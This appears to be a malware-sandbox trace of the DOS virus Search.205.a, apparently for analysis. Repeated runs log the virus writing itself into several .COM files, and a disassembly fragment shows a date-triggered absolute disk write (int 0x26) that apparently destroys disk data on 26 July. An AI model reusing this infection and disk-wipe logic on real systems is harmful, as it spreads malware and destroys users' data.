Sample viewer

vx.netlux.org/Virus.DOS.Search.205.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:43:44.289526636Z 26 PC: 12ab4 | Set disk transfer address
2018-12-17T22:43:44.290771669Z 78 PC: 12ac0 | Find first file
2018-12-17T22:43:44.297471766Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:44.30455577Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.311971667Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.314145594Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.31718378Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.318841196Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.346313373Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.349201902Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.354844737Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.357336223Z 61 PC: 12ad0 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:43:44.361914045Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.366074048Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.367373387Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.369465774Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.371377736Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.375225027Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.378476876Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.387568253Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.391495683Z 61 PC: 12ad0 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:43:44.399957291Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.407354756Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.409206845Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.416859205Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.419692299Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.423320251Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.427933839Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.436783911Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.439854197Z 61 PC: 12ad0 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:43:44.448188727Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.460262199Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.461531595Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.464670017Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.466425043Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.469463618Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.47194117Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.477929936Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.480873934Z 61 PC: 12ad0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:43:44.48832499Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.495770913Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.497325912Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.500277676Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.502095824Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.504897386Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.507860836Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.516951136Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.520015029Z 61 PC: 12ad0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:43:44.527402511Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.540343144Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.542003995Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.544879723Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.54721293Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.556367346Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.559905409Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.569749847Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.572646578Z 61 PC: 12ad0 | Open file (Filename = 'PAH.COM')
2018-12-17T22:43:44.579827092Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.588863173Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.590590972Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.593522299Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.595158668Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.598465387Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.601548006Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.610805895Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.614416426Z 61 PC: 12ad0 | Open file (Filename = 'TEST.COM')
2018-12-17T22:43:44.621588503Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.624308801Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.627247708Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.630069172Z 26 PC: 12b33 | Set disk transfer address
2018-12-17T22:43:44.631434171Z 42 PC: 12b4a | Get date
0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-17T22:43:44.634329305Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:02.935887668Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:02.937927801Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:02.945162552Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:02.952705814Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:02.973011036Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:02.974751981Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:02.977952808Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:02.980132976Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:02.997249103Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.000710426Z 62 PC: 12b28 | Close file
2018-12-25T12:03:03.010274632Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.013382524Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.021331511Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.028767163Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.030942332Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.033953402Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.03553331Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.046303543Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.049594467Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.058950847Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.062885374Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.07028408Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.077386932Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.079760703Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.082681232Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.084237865Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.08737693Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.090749223Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.105261368Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.108687096Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.117207027Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.124217644Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.125799789Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.129961177Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.13147932Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.134388938Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.142176943Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.151049236Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.153953508Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.162860083Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.169999683Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.17143056Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.174475888Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.203768276Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.207411861Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.210807129Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.220831584Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.224025292Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.23194882Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.241353259Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.243443292Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.246934552Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.249985795Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.259785899Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.262997688Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.273055337Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.27695368Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.284646572Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.292270261Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.29521992Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.298566682Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.300450274Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.304845363Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.309055612Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.317881898Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.322575893Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.33028143Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.333068184Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.33586127Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.338663691Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:03.339924952Z 42 PC: 12b4a | Get date
0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:03.342377664Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:03.26498512Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:03.266112598Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:03.273459607Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:03.278183771Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:03.282619812Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:03.284355114Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.287059786Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:03.289182277Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:03.301914122Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.304985949Z 62 PC: 12b28 | Close file
2018-12-25T12:03:03.314152045Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.317312619Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.324375495Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.332104893Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.334865174Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.3369047Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.338012884Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.340143148Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.343299097Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.351700012Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.354369219Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.363087834Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.37123919Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.372979732Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.377124164Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.378835827Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.382421639Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.386147295Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.394672877Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.397587636Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.405603339Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.412958367Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.414513306Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.418232697Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.420045327Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.42299116Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.426884289Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.43563744Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.439413146Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.44784586Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.45532151Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.4572238Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.460523491Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.46344157Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.467270931Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.470603743Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.480362121Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.48349335Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.491323125Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.499858506Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.502391136Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.506872864Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.509269536Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.519484293Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.523736321Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.53290212Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.536784587Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.544265504Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.551532242Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.554198083Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.557223081Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.558824224Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.563230847Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.572960721Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.589403358Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.592736609Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.600791901Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.604018177Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.606449817Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.610616317Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:03.612212406Z 42 PC: 12b4a | Get date
0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:03.61488278Z 25 PC: 12b54 | Get default drive
2018-12-25T12:03:03.623098138Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:03.66021586Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:03.661484198Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:03.671086456Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:03.678930523Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:03.68655993Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:03.689656037Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.692666548Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:03.69431394Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:03.710494406Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.71397442Z 62 PC: 12b28 | Close file
2018-12-25T12:03:03.723348383Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.726484202Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.73445963Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.742005845Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.743910778Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.74772197Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.749476923Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.752453663Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.755946772Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.764716814Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.767722657Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.775544253Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.783133005Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.784602153Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.788935676Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.790996915Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.793954334Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.797514935Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.806363575Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.809137764Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.816961259Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.824498208Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.826062099Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.829120898Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.830856425Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.834104961Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.836904879Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.845717118Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.848423511Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.855937366Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.86334606Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.865282535Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.868522519Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.871061429Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.874422465Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.877313134Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.887467852Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.890980129Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.89878829Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.906489777Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.908230665Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.911221377Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.913066954Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.922037827Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.925744572Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.934649026Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.947797619Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.955320617Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.96272218Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.965280992Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.9683242Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.96999614Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.976133039Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.97949737Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.988771427Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.992969525Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.001263111Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.005899762Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.009166066Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.012790833Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:04.014582162Z 42 PC: 12b4a | Get date
0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:04.017550665Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:04.000084716Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:04.001739945Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:04.007760546Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:04.014272057Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:04.022537381Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:04.024300569Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:04.026817546Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:04.028547809Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:04.045568264Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:04.047391987Z 62 PC: 12b28 | Close file
2018-12-25T12:03:04.0526547Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.057039946Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.064933961Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.071548628Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.074189369Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.077034706Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.078484535Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.082041915Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.084856758Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.092973833Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.096312962Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.103355673Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.109619702Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.111240637Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.11365305Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.114923047Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.117681672Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.120273337Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.127717811Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.13083008Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.137225436Z 63 PC: 12ae1 | Read file or device (See above)
